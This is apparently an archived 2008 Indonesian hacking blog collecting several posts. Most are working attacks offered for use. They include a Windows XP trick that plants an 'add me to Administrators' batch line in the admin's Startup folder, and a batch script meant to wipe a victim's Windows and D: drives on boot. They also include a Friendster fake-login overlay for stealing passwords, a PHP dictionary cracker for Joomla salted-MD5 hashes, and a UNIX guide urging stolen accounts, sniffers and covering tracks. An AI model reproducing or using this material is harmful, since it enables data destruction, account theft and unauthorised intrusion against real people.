Koock

MENDAPATKAN AKSES ADMIN WINDOWS XP. by_anjar

koock — Thu, 18 Dec 2008 03:18:18 +0000

Windows XP yang file systemnya adalah Fat32 memperbolehkan user biasa untuk mengakses direktory home dari admin yang (biasanya) terletak pada lokasi berikut:

C:\Documents and Settings\Administrator\

Sedangkan pada Windows XP yang ber file system NTFS, user biasa tidak akan bisa mengakses direktory home dari admin.

//—net user

User accounts for \\spyroNET

—————————————————————————

Administrator Guest spyro
HelpAssistant SUPPORT_388945a0 SuperUser
The command completed successfully.

MELIHAT HAK AKSES USER
———————————————-

C:\DOCUME~1\spyro>net user SuperUser
User name SuperUser
Full Name
Comment
User’s comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 7/12/2004 3:38 AM
Password expires Never
Password changeable 7/12/2004 3:38 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/12/2004 11:16 PM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.

Kini kita sudah tau siapa yang menjadi Administrator. Buatlah script batch seperti berikut:

net localgoup Administrators spyro /add

Simpan di lokasi berikut:
C:\Documents and Settings\SuperUser\Start Menu\Programs\Startup

Tunggu sang admin untuk login… setelah itu, level kita sudah setingkat admin

sript pengatur waktu session, log out otomatis. by_anjar

koock — Thu, 18 Dec 2008 03:09:21 +0000

Posted By: Anjar

Script pengatur waktu Session, Logout Otomatis

Halaman Ini dibaca 1356 kali

Banyak
hal terjadi jika seseorang telah berhasil login sebagai user, dan
tentunya login ini ada ketika user akan memanfaatkan layanan dari suatu
website, bukan karena sebab yang lain, seperti tingkat sekuritas yang
buruk. Selalu ada masa idle. Idle di sini bermakna user tidak melakukan
apa-apa sama sekali di website tersebut, tidak berpindah halaman, tidak
memasukkan input pada form manapun, dan tidak ada hal apapun yang
menyebabkan sebuah halaman website terrefresh, dengan kata lain user
tidak melakukan apa pun pada website yang sedang dia kunjungi. Sungguh
user yang aneh. ~~. Tapi hal seperti ini dapat terjadi jika user
sedang asik mengunjungi website yang lain, dan lupa akan website yang
dia kunjungi sebelumnya. Tentunya keadaan user pada website yang
dikunjungi sebelumnya dianggap sebagai condition yang idle oleh website
tersebut. Tidak ada hal apapun yang terjadi di website sebelumnya. Atau
kondisi lain, dimana seorang user yang telah 10 menit meninggalkan
pc-nya dalam keadaan lupa melogout accountnya. Sungguh terlalu. Di
sinilah fungsi pengatur waktu session benar-benar dibutuhkan.
Ada
dua cara untuk mengatur waktu session, yang pertama adalah merubah
konfigurasi session timeout pada php.ini, cara yang terakhir yaitu
dengan memanfaatkan fungsi time() dan variable session yang telah
teregistrasi, dengan kata lain cara yang terakhir ini adalah merancang
barisan code yang dapat mengatur waktu session. Penulis tidak akan
menjelaskan cara yang pertama. Tapi yang akan penulis jelaskan adalah
cara yang kedua. Penulis akan mengambil sebuah contoh kasus, ini untuk
memudahkan penjelasan secara logika, dan penjelasan alur dari cara
kerja script yang akan dibuat.
Kasusnya seperti ini, “Ketika user
telah berhasil login, akan ada sebuah session yang digunakan sebagai
patokan untuk membandingkan berapa lama user telah berada pada halaman
website tersebut. Apabila waktu time() yang berjalan lebih besar dari
nilai session dari variable yang dijadikan sebagai patokan nanti maka
user tersebut akan secara otomatis terlogout”.

Secara struktur, algoritmanya akan seperti ini :

Sediakan sebuah variable x, berisi waktu sekarang ditambah 30 detik.
Jadikan
variable x tersebut sebagai session, yang akan membypass valuenya pada
setiap halaman, dengan kata lain, isi variable x tersebut dapat
ditampilkan di halaman mana pun.
Bandingkan waktu sekarang dengan nilai dari variable x tersebut.
Jika waktu sekarang lebih kecil dari nilai variable x tersebut, maka si user masih dalam keadaan login.
Jika waktu sekarang lebih besar dari nilai variable x tersebut, maka keadaan si user adalah logout.
Jika
user melakukan refresh halaman, berpindah halaman, mengisi form,
sebelum masa sessionnya habis maka waktu login di tambah 10 menit
berikutnya.

Ya, untuk algoritma di atas penulis bagi
menjadi 2 function, yakni function login_validate() dan login_check().
Langsung saja persiapkan script yang dibutuhkan :

File index.php :

require_once “functions.php”;
if (( $_POST['username'] == ‘admin’ ) && ( $_POST['password'] == ‘admin’))
{
$_SESSION['user'] = $_POST['username'];
login_validate();
header(“location: admin.php”);
}

else if ( empty($_POST['username']) && empty($_POST['password']) )
{
header(“location: login.php”);
}

Selanjutnya file intinya yaitu,
functions.php :

session_start();

function login_validate() {
$timeout = 30;
$_SESSION["expires_by"] = time() + $timeout;
}

Kemudian
admin.php, barisan code dalam admin.php ini penulis ibaratkan seperti
kondisi dari admin yang telah berhasil login. Jika lebih dari 30 detik
maka user secara otomatis akan di logout. Nilai 30 detik ini
diambil dari variable $timeout yang ada di functions.php.

File Admin.php :

require_once “functions.php”;

if (ISSET($_SESSION['user']))
{
    if (!login_check()) {
        header(“Location: logout.php”);
        exit(0);
        }
    else {
        echo “Jika tidak ada kegiatan sama sekali, anda akan logout secara otomatis … “;
        }
}

else
{
echo “Anda tidak berhak untuk ngapa-ngapain … !! “;
}

Selanjutnya halaman login usernya, login.php :

Terlihat
jelas pada baris ke 4 di atas, halaman login page memiliki action,
menuju index.php, yang kemudian menghasilkan 2 variable POST, yaitu
$_POST[‘username’], dan $_POST[‘password’]. Kedua variable inilah yang
kemudian dicek pada halaman index.php.

Dan yang terakhir adalah logout.php :

require_once “functions.php”;

unset($_SESSION['user']);
session_destroy();
header(“location: login.php”);

Cara kerja source code di atas cukup sederhana, lihat barisan code index.php,

……
if (( $_POST['username'] == ‘admin’ ) && ( $_POST['password'] == ‘admin’))
{
$_SESSION['user'] = $_POST['username'];
login_validate();
header(“location: admin.php”);
}

else if ( empty($_POST['username']) && empty($_POST['password']) )
{
header(“location: login.php”);
}
….

Penjelasannya
adalah sebagai berikut, Jika user memasukkan username dan password yang
cocok ( dalam kasus ini username dan passwordnya adalah admin ) maka
user akan diberikan sebuah variable session, yakni
$_SESSION['user'], dan akan ditambahkan sebuah variable baru yang
nantinya variable ini berfungsi sebagai timer,
yakni

$timeout = 30;

Variable
tersebut berada dalam fungsi login_validate() pada script
functions.php. Sedangkan masih dalam fungsi login_validate, lompat ke
barisan code dibawahnya yaitu :

$_SESSION["expires_by"] = time() + $timeout;

Disinilah
letak timer yang sebenarnya, kehebatan dari session adalah dapat
melakukan passing value walaupun halamannya berbeda. Jelasnya
$_SESSION["expires_by"] mengambil nilainya dari waktu ketika user
pertama kali login yaitu time() di tambah dengan 30 detik kedepannya,
yakni isi dari variable $timeout.

Nah, dari situ, lihat ke bagian fungsi yang ada di bawahnya, pada functions.php :

…
function login_check() {
    $exp_time = $_SESSION["expires_by"];
    if (time() < $exp_time) {
        login_validate();
        return true;
    } else {
        unset($_SESSION["expires_by"]);
        return false;
    }
}
….

Ya, lihat baris :
$exp_time = $_SESSION["expires_by"];

Varibale $exp_time itu memiliki nilai dari $_SESSION["expires_by"],
Untuk
kejelesannya penulis berikan contoh seperti ini, jika user login pada
waktu jam 5, maka $_SESSION["expires_by"] berisi jam ke 5, menit
ke 0, dan detik ke 30. Dan secara alami pun diketahui bahwa yang
namanya waktu pasti akan terus bertambah tentunya. Tapi karena berada
dalam fungsi, variable $_SESSION["expires_by"] ini tidak akan
bertambah, walaupun time() terus berlanjutnya.

Lompat ke baris selanjutnya :
    if (time() < $exp_time) {
        login_validate();
        return true;

Dalam
baris tersebut sederhananya adalah, jika waktu yang sekarang berjalan
lebih kecil nilainya dari nilai yang ada pada
$_SESSION["expires_by"], maka tambahkan 30 detik lagi, dan jika
waktu pada time() sama dengan nilai $_SESSION["expires_by"] maka user
akan otomatis logout

Selanjutnya …
…
else {
        unset($_SESSION["expires_by"]);
        return false;
    }
…

Jika waktu yang sekarang berjalan itu lebih besar dari nilai yang ada pada $_SESSION["expires_by"], maka lakukan logout.

Script tersebut dapat di download di sini
http://networkandgame.890m.com/ilmuwebsite/article/session-time-by-alk.zip
Cukup jelas ya. Jika ada yang di tanyakan, silahkan layangkan pertanyaan ke email penulis. alkemail@gmail.com.

Greetz
: b_scorpio, abuzahra, peterpanz, kandar, phii_, syahrilrohman, ivan,
dr.emi, safril, najwa. Special for jojo. . Hi, Jo! Have a nice day.

friendster layer injection. by_anjar

koock — Thu, 18 Dec 2008 03:03:19 +0000

what’s fs’s layer injection actually? ..well , the goal of layer injection is to put a new layer above all other layers in modification of personal fs profile. With this trick , you’ll be able to cheat your fs profile ,and further more , this trick is also very useful in accountZ hijacking !(i won’t publish this one) hEHEHE..

Ok,let’s move on, the main mistake that fs ever made is that they enable their users to put HTML tag on their personal profile.. that’s the core part of this injection. Let’s try the simplest layer injection to cheat the FS logo which always appears on the left-top on your profile.

-> go to ‘edit profile’ page.

-> select which form you want to inject from. (i prefer ‘about me’).

-> insert a modified html-layer tag (div) like this :

-> Core tags explanation:

DIV align=left — to set the layer’s aligh to ‘left’.

DIV id=Layer1 — to make fs pretends that the injected layer is the ‘main layer’
which covers other layers.

POSITION: absolute — to make the layer’s position to be absolute , so the screen’s size won’t disturb it.

HEIGHT: 76px —> set the size of the area u want to cover with your layer.

WIDHT:500px

IMG SRC —-> insert your image-url-path. (your new logo)

Program Perusak Sang LAMER. by_anjar

koock — Thu, 18 Dec 2008 02:58:02 +0000

Ini khusus buat para “Lamer sejati” yang pengin ngerusak kompynya orang. Kalo kamu ngerasa bukan lamer, segera tinggalin artikel ini!!

Okay, ngga’ usah banyak omong, lansung aja copy-pastekan code sialan di bawah ini ke teks editor kamu dan simpan dengan ekstensi .bat:

@echo off

echo deltree /y %windir%\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

echo deltree /y d:\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

atau

@echo off

echo deltree /y %windir%\*.*>> AUTOEXEC.BAT

echo deltree /y d:\*.*>> AUTOEXEC.BAT

wELL, ga’ perlu dijelasin pasti udah pada ngerti donk. Yup, kalo udah disimpan (misalnya LAMER.BAT) lansung eksekusi dan shutdown komputernya trus kabur dech hihihi… program perusak kamu bakalan bekerja dengan sendirinya begitu si korban nyalain komputernya lagi.

/* ——————————|EOF|—————————— */

Hacker UNIX.by_anjar

koock — Sun, 07 Dec 2008 07:39:38 +0000

Jadi kamu memutuskan untuk menjadi seorang hacker UNIX tapi kami nggak tau gimana mulainya? Sebelum kamu benar-benar mulai, pastikan bahwa hal-hal berikut ini adalah jelas:

1. Hacking adalah kerja keras. Hacking bukanlah tempat bermain anak-anak yang hanya ingin mendapat 15 menit secara cuma-cuma. Kamu harus belajar bagaimana caranya mengoperasikan dan memprogram sebuah system. Kamu mesti ngeriset bagaimana mesin-mesin bereaksi dan membaca kode-kode asli. Ini adalah proses yang panjang dan sukar – inilah peringatan untuk kamu!
2. Hacking adalah ilegal. Masuk ke jaringan komputer tanpa izin adalah ilegal, paling tidak di banyak negara (hanya Belanda dan Argentina kalo nggak salah yang belum punya hukum mengenai hacking. Belum aja, sih … paling juga nanti akan ada.) Walaupun hanya log-on ke sebuah sustem dengan menggunakan account bukan milikmu adalah tindakan pidana yang bisa dikenakan hukuman. Sekali sang hakim menjatuhkan hukuman, maka hukuman tersebut akan dimasukkan ke data hidup / arsip kamu. Seluruh hidup kamu mungkin bisa terlantar karena hanya sedikit perusahaan yang bersedia menerima hacker sebagai karyawan. Ini serius. Apalagi di Indonesia. Jika kamu meng-hacking server milik pemerintah, bisa dijamin kamu akan amblas. Dan keluarga kamu nggak aman! Beberapa anggota kami nggak bisa balik lagi ke tanah air karena sudah dicekal, dan terakhir, pemerintah mulai menyelidiki asal-usul ChiKo dan mencari keluarganya di Indonesia.
3. Hacking memerlukan banyak waktu. Kamu nggak mungkin cuman nge-hack selama setengah thun, terus berhenti dan istirahat selama tiga bulan, lalu kembali lagi. Waktu berjalan cepat di internet. Rilis baru UNIX, bug-bug baru, dan juga fix-fix nya. Sekali kamu ketinggalan jaman dengan eksploit data milikmu, kamu mesti mengemis-ngemis ke orang lain untuk memberikan barang-barang baru kepadamu, dan jika kamu melakukan hal tsb terlalu sering, mereka nggak akan begitu senang jadinya. 50% dari waktu hacking sebenarnya dihabiskan untuk mengumpulkan informasi. Bicaralah ke hacker-hacker lainnya, baca mailing lists dan newsgroups, jangan lupa situs-situs www dan ftp yang bagus.
Tapi apa motivasi kamu untuk secara benar-benar melakukan ‘unix hacking’? Itu terserah kamu. Kamu ingin menjadi salah satunya, maka pikirkan lagi mengapa kamu ingin menjadi salah satu unix hacker. Lupakan film-film seperti “The Net” ataupun “Hackers” – film-film tsb BUKANLAH realita! Lupakan mimpi-mimpi menjadi pahlawan, mengehack Pentagon atau HanKam dan menjadi cowok terseksi, mendapat pacar-pacar yang cantik dan pada akhirnya bekerja untuk sebuah perusahaan keamanan sistem dengan gaji berjibun ;o). Hal-hal tersebut BUKANLAH apa yang akan terjadi – jadi, pastikanlah bahwa alasan kamu jelas, mengapa kamu ingin menjadi hacker dan apa yang kamu harapkan dari hacking. Bisakah kamu bayangkan ibundamu tercinta, tersedu-sedu saat polisi datang untuk menahanmu?
Ingatlah peringatan-peringatan ini. Ini kami jadikan peringatan untuk memastikan bahwa kamu menyadari apa yang kamu lakukan dan kamu ingin menjadi apa. Catatan juga bahwa kami menulis petunjuk singkat ini sebab seringkali kami mendapat pertanyaan dari banyak orang, “Gimana caranya supaya gue jadi jago nge-hack UNIX?” – dan dari waktu ke waktu kami menjadi makin cape ngejawabinnya. Maka … inilah dia jawaban-jawabannya. Jangan salahkan kami atas ketidaklengkapan ataupun kesalahan- kami udah nggak peduli lagi dengan permintaan-permintaan ngajarin nge-hack lewat jalan potong. Hanya yang paling tahan bantinglah yang bertahan – jadi, cobalah mendapatkan sebanyak mungkin melalui teks ini jika kamu benar-benar masih pemula. Kami sendiri masih belum pantas menyandang gelar “hacker” karena kami merasa masih jauh sekali tertinggal oleh rekan-rekan kebangsaan lain dan kami masih selalu dalam proses mempelajari segalanya.
Gimana cara mulainya?
1. Kenalilah sang sistem – atau – gimana caranya kamu bisa menang rodeo tanpa belajar caranya menunggang kuda?
2. Dapatkan distribusi unix. Cobalah mendapatkan Linux, FreeBSD, Solaris, Sinix dll. untuk PC kamu. Linux dan FreeBSD adalah sistem-sistem murah (kadang-kadang gratis!) yang berasal dari BSD, sedangkan Solaris dan Sinix adalah sistem-sistem mahal yang berasal dari System V. Tip: Carilah distribusi linux yang punya buku pegangan yang cukup bagus. Kamu mesti mempelajari bagaimana caranya mengoperasikan unix. Pelajarilah dasar-dasarnya, seperti mengganti direktori, perintah-perintah menyalin dan menghapus dan menggunakan program penyunting.
3. Motivasi dirimu sendiri untuk secara benar-benar menggunakan UNIX. Gimana caranya memotivasi – itu terserah kamu sendiri. Mungkin dengan menggunakan databasi yang ada di distribusi unix kamu, membuat program dalam C untuk sekolah/universitas kamu, apa aja lah, yang jelas kamu mesti benar-benar menggunakan unix (seperti jamannya ngetik perintah di DOS dulu).
4. Beli beberapa buku untuk menolong kamu. Diluar sana ada banyak, jadi, pergilah ke toko buku terkemuka, paling bagus didekat sebuah universitas, dimana banyak orang-orang yang bisa menolong memberitahukan buku-buku apa yang cukup baik mengenai unix. Buku-buku Nutshell terbitan O’reilly (dan terjemahannya) kami sukai, namun ini adalah opini pribadi. Kamu mungkin mau mulai dengan seri For Dummies terbitan IDG (banyak yang bahasa Indonesianya. Baca FAQ untuk judul-judul lain.
5. Dapatkan internet account dengan PPP dan/atau akses shell (hubungi ISPmu). JANGAN SEKALI-KALI menge-hack atau bertukar informasi mengenai hacking (tanpa PGP) dengan menggunakan account milik kamu sendiri (atau account dibawah nama/alamat/telepon kamu!). Coba untuk mengkonfigurasikan PC unix kamu untuk menghubungkan diri ke Internet provider. Beberapa distribusi Linux dilengkapi dengan sebuah buku petunjuk dimana mereka menggambarkan gimana caranya untuk menyambungkan ke internet. Jika kamu sudah mengikuti 5 langkah tsb diatas dan mengetahui caranya mengoperasikan unix (ini akan makan waktu sekitar 2 – 8 minggu) maka kamu sebaiknya melanjutkan ke langkah berikutnya:

Pelajari Dasar-Dasarnya!

6. Kembalilah ke toko buku, kali ini carilah buku-buku mengenai unix dan keamanan internet. Beberapa buku terbitan Elex Media membahas hal ini. Buku-buku berbahasa inggris antara lain “Practical Unix Security” oleh Garfinkel and Spafford. Pelajari masalah-masalah keamanan dasar, ‘holes’ dan ciri-ciri apa yang ada di unix, dan kesalahan-kesalahan apa yang sering orang-orang lakukan.
7. Cobalah untuk mendapatkan semua informasi dan file-file yang kamu bisa temukan di internet. Selidiki situs-situs www dan ftp dan gunakan mesin pencari. Berlangganlah ke mailing list mengenai keamanan yang cukup penting dan bacalah newsgroups yang mungkin bisa jadi penting. Tanya-tanya di sekeliling di IRC mengenai situs-situs yang bagus. berikut adalah situs-situs untuk permulaan:

http://wks.uts.ohio-state.edu/unix_course/unix.html
http://www.mcsr.olemiss.edu/unixhelp/

8. Baca dan analisa file-file hasil kumpulan kamu – dan jangan cuman dikumpulin aja. Jika kata-kata seperti suid, buffer overflow, firewall, rdist, nis, nfs, dan SATAN sudah menjadi bukan rahasia lagi bagi kamu dan kamu benar-benar mengetahui apa makna dan konsekwensi kata-kata tersebut, …lanjutkan.

Mulai Hacking

9. Dapatkan sebuah account yang bukan milikmu! Coba minta dari hacker yang kamu kenal/jumpai. Atau gunakan metode-metode yang ada di FAQ. Ingatlah: jangan coba-coba nge-hack dari account milik kamu sendiri!
10. Dengan account ini kamu bisa mencoba untuk menge-hack sistem pertamamu. Coba eksploit-eksploitmu. Tapi ingatlah untuk selalu untuk menutupi jejak (artikel akan segera menyusul) supaya account ilegal milikmu tidak menjadi sejarah setelah baru sekali dipakai!
11. Gunakan ypx, eksploit – eksploit remote sendmail, insecure NFS exports, dll untuk mendapatkan host-host lainnya. Kamu bisa menjadi benar-benar sukses dengan barang “lama” ini jika kamu menggunakan daftar host yang cukup besar dan skrip tulis/temukan (write/find) yang mengotomatisasi proses penge-test-an untuk kamu. Tapi dimana bisa ditemukan nama-nama host untuk membuat daftar host? Banyak kemungkinan. Coba irc, /etc/hosts, www, data analisis statistik dari akses-akses internet atau www, dll. Ini akan memberikan kamu banyak host dengan account-account yang ada.
12. Instal sebuah sniffer jika keadaan sistem memungkinkan dan kamu membobol account ‘root’! Account ini akan memperbolehkan kamu mengakses banyak account ke host-host baru. Jalankan skrip-skrip eksploit kamu. pada akhirnya paling tidak ada beberapa yang bisa digunakan. Lanjutkanlah.

Menjadi seorang Hacker

APA? Kamu udah berhasil nge-hack root di beberapa sistem – dan kamu masih belum juga seorang “hacker”? Kenapa tuh? Seorang hacker bukanlah seseorang yang kerjanya menge-hack sebuah site, install sebuah sniffer dan selanjutnya. Seorang hacker asli adalah seseorang yang ingin mengerti sebuah sistem, mengetahui bagaimana sang sistem bereaksi, bersenang-senang mengambil alih kekuasaan di server tersebut dan tertarik dalam menemukan bugs-bugs baru dan mengarang program-program kegunaan (tool utility) baru. Yang cocok digambarkan diatas bisa dipanggil Columbus-nya Cyberspace.
13. Cobalah untuk berhubungan dengan hacker-hacker lainnya dan saling bertukar informasi, pengalaman, accounts, eksploits, dan file.
14. Amati diskusi-diskusi di newsgroups, mailing lists, dan irc. Cobalah membaca RFC-RFC penting, pelajarilah C dan mulailah memprogram tools karyamu sendiri.
15. Jangan kut-ikutan menjadi “31337″ – kamu sendiri tahu bahwa kamu udah cukup keren hackingnya (“cool”, gitu, bahasa Sunda-nya mah!) dan kamu nggak perlu untuk meyakinkan setiap orang bahwa kamu emang elit. Bertindaklah secara normal dan tolonglah orang-orang lain yang sekarang bertanya-tanya kepada kamu “gimana caranya supaya gue bisa nge-hack UNIX?”
16. Jangan lelah. Tetaplah bertahan di kawasan per-hacking-an, selalu amati newsgroup dan mailing list dan teman teman, jangan berhenti ber-hacking ria.
Yah, segitulah dari kami, kawan-kawan, teks diatas kayaknya cukup untuk membuat para pendatang baru tersedak mulutnya. Teks tsb emang singkat dan kotor, namun mempunyai apa yang diperlukan.

Cara Paling Mudah Menghindari Hacking Friendster By Tarecha

koock — Thu, 27 Nov 2008 01:48:01 +0000

Gampang Kug Caranya,
gak usah punya fs…

wk wk wk

Teknik Lain : Hack Password Friendster.by_anjar

koock — Sun, 23 Nov 2008 08:18:46 +0000

Hi… sudah lama enggak menulis. Kali ini saya akan menerangkan cara mendapatkan password Account Friendster. Tidak usah susah payah membuat testimonial redirect dan meng-upload halaman php tipuan atau apalah. Lagipula bug itu sudah di-patch oleh pengelolanya . Oke kali ini teknik dari blognya mas Sepri. Sampai saat tulisan ini dibuat teknik ini masih bisa dilakukan dan katanya 10000% berjalan

Begini langkah-langkahnya :

1. Download Script-nya mas Sepri di LINK INI

2. Buka pakai Word atau Wordpad biar yg ia tandai bisa terlihat

3. Kalian cukup ganti Nomor yang dia tandai BIRU
Ganti pakai nomor ID kamu di FS. Cara liatnya? Gampang…
Tingall logout dari Account FS kalian. Lalu masuk ke URL halaman FS kamu tanpa Login. Nanti di Address Box ada tulisan kayak gini : http://www.friendster.com/%USER ID KAMU%.

Misalnya User ID-nya adalah 16419975 maka kalimatnya adalah http://www.friendster.com/16419975.

Copy user ID (angka-angkanya aja) FS kamu dan gantikan angka-angka yang ditandai biru di Script tersebut dengan User ID FS yang sudah di-copy.

4. Buka LINK INI

5. Copy kode yang dari Script yang udah di rubah ke bagian atas

6. Tekan GENERATE

7. Copy code yang bawah

8. Paste di MEDIA BOX halaman FS kamu.

Selesai

Cara kerjanya adalah :

Sang korban melihat profile kita terus dalam hitungan menit
profile tersebut berubah menjadi tampilan log-in
dan bagi yang ga merhatikan mungkin ini login asli soalnya masih
dalam address friendster…….

Padahal ini adalah halaman send message yang ia rubah menjadi halaman log-in. Jadi kalau diisi tuh Korban secara otomatis kirim message ke kita dan kita ga perlu report2 bikin php atau apalah
nah kenapa saya suruh ganti nomor ID FS tersebut soalnya itu adalah nomor ID mas Sepri jadi kalau ga dirubah
maka pesannya akan masuk ke FS mas Sepri huehuehueh…..

Kode ini hanya berlaku untuk mencuri Password FS yang sudah di generate emailnya dan bagi yang belum digenerate selamatlah anda……

teknik melindungi FS dari tangan2 jahil.by_anjar

koock — Sun, 16 Nov 2008 05:25:36 +0000

helo2 kawan2 smua

aq mo bagi2 info nih
semakin hari kayaknya yang namanya hack fs makin banyak dan makin rame kan
para hacker2 memanfaatkan yang namanya testiomonally untuk hack fs kalian smua
gini nih cara nglindungin FS dari para hacker2 yang suka jahil.sebenarnya mereka bukan hacker tapi memanfaatkan softaware hacker.heheh2X
1.klo testi di aprove dan kalian kembali lagi ke menu login mendingan tutup aja deh halaman web friendster itu karena itu bukan merupakan halaman fs yang asli ato itu bisa dibilang palsu deh.solusinya klo dah gini km buka aja halaman baru friendster.
2.sebelum kamu aprove tu testi mendingan di copy dulu ke notepad ato ke PM an YM ato di mIRC klo isinya dan paste-an isi yang kamu copy tadi ga sama delete aja tuh testi daripada kena hack pusing juga nanti.
3.Klo emang udah pernah ngalamin hal itu mending liat aja deh daftar2 FS yang dah kena hack disini kali aja fs kamu ada disana segera ganti pasword klo emang udah masuk ke daftar2 FS yang dah kena hack.coba lihat disini

ada sih HAck FS varian baru yaitu kita ga bs liat halaman Testiomonally kita karena dah di overlay kan ke web orang lain. temen2 aq banyak yang kena gitu aq juga kena kok

hehehe2X
lain kali aja tapi tulisnya aq capek nih hehehe2X

thanks dah mau baca artikel jelek aq ini bye2X

by Admin

Konsep sederhana Joomla Password Cracker.by_anjar

koock — Sun, 16 Nov 2008 05:22:56 +0000

Posted By: Anjar

Konsep sederhana Joomla Password Cracker

15-11-2008 | 15:51:31 | Halaman Ini dibaca 999 kali

Apa
yang akan penulis jelaskan disini, begitu juga dengan apa yang telah
penulis jelaskan pada tutorial sebelum-sebelumnya, mengenai hacking
tentunya, di ibaratkan seperti pisau yang memiliki 2 sisi tajam, di
satu sisi seorang admin web dapat menjaga ketat sitenya dengan aman,
namun patut diketahui pula tidak ada sistem yang memiliki keamanan
100%, selalu saja ada bolong yang masih dapat di eksploitasi, tapi
setidaknya dapat meminimalisir serangan yang ada, dan di sisi lain yang
akan penulis terangkan nanti tentunya cenderung digunakan untuk
kegiatan vandalisme/merusak oleh beberapa pihak. Ya, tidak heran jika
teori tesis dan anti tesis kerapkali hadir dalam dunia perhackingan
ini. Di satu sisi membangun tapi di sisi lain menghancurkan. Lantas
yang harus di lakukan sekarang adalah, tetap waspada pada security risk
yang ada, dan ketahuilah tamu tak diundang selalu menyempatkan waktunya
untuk hadir memonitoring site anda, jika anda melakukan sedikit saja
salah langkah akibatnya cukup fatal.

Waha… sepertinya intro
tutorial harus dipisahkan sendiri dalam tutorial yang berbeda, jari
penulis begitu asik menari-nari di atas tuts keyboard sampai-sampai
lupa pada pokok pembahasan. .

Ya, berdasarkan artikel
sebelumnya, betapa mudahnya seorang attacker mendapatkan username dan
password sang administrator pada content management system seperti
joomla, tapi masih terdapat satu masalah, dimana seorang attacker
masih belum dapat melakukan eksploitasi lebih lanjut, dikarenakan
password yang didapatkan itu masih dalam bentuk password yang
terenkripsi, sehingga butuh perlakuan khusus lebih lanjut untuk
mendapatkan password yang sesungguhnya. Di sinilah penulis akan mencoba
menjelaskan sebuah konsep sederhana bagaimana mendapatkan suatu
password asli yang terenkripsi, namun penulis hanya membatasi cracking
password pada satu jenis hash saja, yaitu joomla hash password.
Penjelasan yang akan penulis lakukan bukanlah mencoba membuat algoritma
dekripsi password tetapi hanyalah penggunaan metode dictionary file,
dimana untuk mendapatkan password asli cukup dilakukan pencocokan
password dengan kamus data yang ada sehingga menghasilkan password yang
sebenarnya. . Namun setiap aplikasi selalu saja memiliki kekurangan,
penulis tidak menafikan hal itu. Karena kesempurnaan hanyalah milik
sang Pencipta. Kekurangannya adalah resource memori yang di butuhkan
untuk metode seperti ini cenderung lebih besar dari ukuran biasanya.

Berikut adalah source code lengkap ‘simple joomla password cracker’ :

———————–// cut here

::: Joomla Password Cracker :::

align=”center” style=”margin-top: 0″> face=”Verdana” size=”2″> size=”4″>Simple
size=”4″> color=”#00FF00″>Joomla

Password
Cracker size=”2″>

color=”#00FF00″>Developed by : ilmuwebsite.com

$hashes=array();
$i=0;
$parts=explode(“:”,$_POST['hash']);
$hashes[$i][0]=$parts[0];
$hashes[$i][1]=$parts[1];

if (ISSET($_POST['hash']))
{
$str = ” “;
echo “Started: ”;
echo date(“F j, Y, g:i:s a”);

$lines = file(‘kamus2.txt’);

foreach ($lines as $line_num => $line)
{
check($line);
}

$lines = file(‘kamus1.txt’);

foreach ($lines as $line_num => $line)
{
check($line);
}

echo “
Finished : ”;
echo date(“F j, Y, g:i:s a”);

}

function check($a)
{
global $i;
$a=rtrim($a) ;

for($x=0;$x<=$i;$x++)
{
global $hashes;

if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo
“ color=#FFFFFF>

The password is :

color=#00FF00>

$a

”;
echo “Ended: ”;
echo date(“F j, Y, g:i:s a”);
}

}

}
?>
size=”2″ face=”Verdana”
color=”#FFFFFF”>

Tolong di kembangkan ya
?!

———————–// cut here

Untuk menjalankan script ini di localhost anda perlu merubah konfigurasi php.ini, yaitu dengan mengganti baris ini :
memory_limit = 32M ;

menjadi > 32, penulis menggantinya menjadi :
memory_limit = 256M ;

Ya,
sebelum berlanjut, penulis akan membahas struktur password joomla yang
terenkripsi terlebih dahulu, enkripsi password joomla biasanya terdiri
dari hash dan salt. Standar enkripsi joomla biasanya berbentuk seperti
ini :

b51498faae03f7cf533e3ed97fc00116:9VrQpQzdNQHhtieK

Hashnya
itu terdapat pada bagian yang pertama yaitu
b51498faae03f7cf533e3ed97fc00116, dan saltnya itu ada di bagian akhir
9VrQpQzdNQHhtieK, keduanya terlihat di pisahkan dengan titik dua “:”.
Salt bagi seorang attacker berfungsi untuk membantu dalam pencarian
password sesungguhnya.
Yang ditemukan disini adalah jika password
berbentuk plain text di gabung dengan saltnya maka akan menghasilkan
hash password joomla. Dengan kata lain jika : x + salt = hash joomla.
Sehingga jika di implementasikan melalui enkripsi md5 :

md5(x + salt) = hash

maka :

md5(x + 9VrQpQzdNQHhtieK) = b51498faae03f7cf533e3ed97fc00116

berapakah x ? ( pak Mamat guru matematika di SMAN 4 Bogor kayanya tau. huehuehuehehe… )

Ya seperti pada baris kalimat ini :

…
if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo
“ color=#FFFFFF>

The password is :

color=#00FF00>

$a

”;
…

Dan hasilnya adalah …

Penulis
yakin anda cukup familiar dengan source di atasnya. Dan algoritmanya
pun cukup mudah. Script lengkap dan kamus passwordnya dapat di download di sini …
Selamat mencoba. Selamat mengembangkan !

Greetz
for : b_scorpio, peterpanz, abuzahra, phii_, nazwa, jojo, ivan, fadli,
safril, dr.emi, husniearif, [H], dan ilmuwebsite community.

Implementasi SQL Injection pada Joomla.by_anjar

koock — Sun, 16 Nov 2008 05:20:36 +0000

Posted By: Anjar

Implementasi SQL Injection pada Joomla

28-10-2008 | 10:25:41 | Halaman Ini dibaca 1775 kali

Apa
jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin
tidak memperhatikan security risk yang ada? Apa jadinya jika ‘the
choosen one’ ternyata seorang admin yang tidak tahu sama sekali
mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang
ada admin yang meremehkan system keamanan. Apa jadinya jika server anda
memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang
akibat dari hasil penggabungan dua kata tersebut. Yang terjadi adalah
peluang seorang attacker untuk menyusup ke dalam website anda semakin
memungkinkan, mengobrak-abrik server anda, bahkan tidak jarang seorang
attacker mengambil profit dari exploitasi system yang ada. Dalam
berbagai hal, termasuk mendulang dollar dengan cara tidak halal.
Seperti yang dilakukan oleh para carder.

Penulis akan
menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan
